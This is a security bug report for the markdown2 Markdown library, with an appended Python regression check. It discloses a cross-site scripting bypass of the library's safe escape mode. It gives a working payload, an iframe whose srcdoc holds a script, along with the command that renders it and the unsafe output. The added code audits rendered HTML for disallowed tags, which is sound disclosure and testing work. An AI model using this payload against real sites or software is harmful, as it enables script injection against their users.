Safe Mode XSS #694

@salvatore-abello

Describe the bug
It's possible to bypass the safe mode (escape and replace).

To Reproduce
Create a file called PoC.html:

<iframe
<http:> srcdoc="<script>alert()</script>" a=

Then, execute:

markdown2 --safe escape PoC.html > result.html

The content of result.html will be:

<p><iframe
&lt;http:&gt; srcdoc="&lt;script&gt;alert()&lt;/script&gt;" a=</p>

Finally, open result.html with a browser and you should see a pop up.

Debug info
Version of library being used: 2.5.6 (fetched from github)
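
Why the escaped output above still runs script, as an added example (not part of the original issue and not markdown2's own code): the leading `<iframe` in result.html is left unescaped, so an HTML parser reads the rest of the line as attributes and decodes the character references inside `srcdoc`. The `audit` helper, the `TagAuditor` class and the `ALLOWED_TAGS` allowlist are assumptions made for illustration; the check uses only Python's standard library and can be run as a regression test on safe-mode output.

```python
from html.parser import HTMLParser

# Output of `markdown2 --safe escape PoC.html`, copied from the issue above.
RESULT_HTML = (
    '<p><iframe\n'
    '&lt;http:&gt; srcdoc="&lt;script&gt;alert()&lt;/script&gt;" a=</p>\n'
)

# Constructed for comparison: the same text with the leading "<" escaped as well.
FULLY_ESCAPED = '<p>&lt;iframe srcdoc="&lt;script&gt;alert()&lt;/script&gt;" a=</p>\n'

# Assumption: the tags a safe-mode render of plain text is expected to emit.
ALLOWED_TAGS = {"p", "em", "strong", "code", "pre", "blockquote", "ul", "ol", "li"}


class TagAuditor(HTMLParser):
    """Records every start tag outside the allowlist, with decoded attributes."""

    def __init__(self, allowed):
        super().__init__(convert_charrefs=True)
        self.allowed = allowed
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in self.allowed:
            # Attribute values arrive with character references decoded,
            # which is also what a browser does before using srcdoc.
            self.findings.append((tag, dict(attrs)))


def audit(html, allowed=ALLOWED_TAGS):
    """Return (tag, attributes) for each element a safe render should not contain."""
    auditor = TagAuditor(allowed)
    auditor.feed(html)
    auditor.close()
    return auditor.findings


if __name__ == "__main__":
    for tag, attrs in audit(RESULT_HTML):
        print(f"unexpected <{tag}> attributes={attrs}")
    print("fully escaped variant findings:", audit(FULLY_ESCAPED))
```

A string search for `<script` would miss this output, because the script markup only appears after the parser decodes the attribute value.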
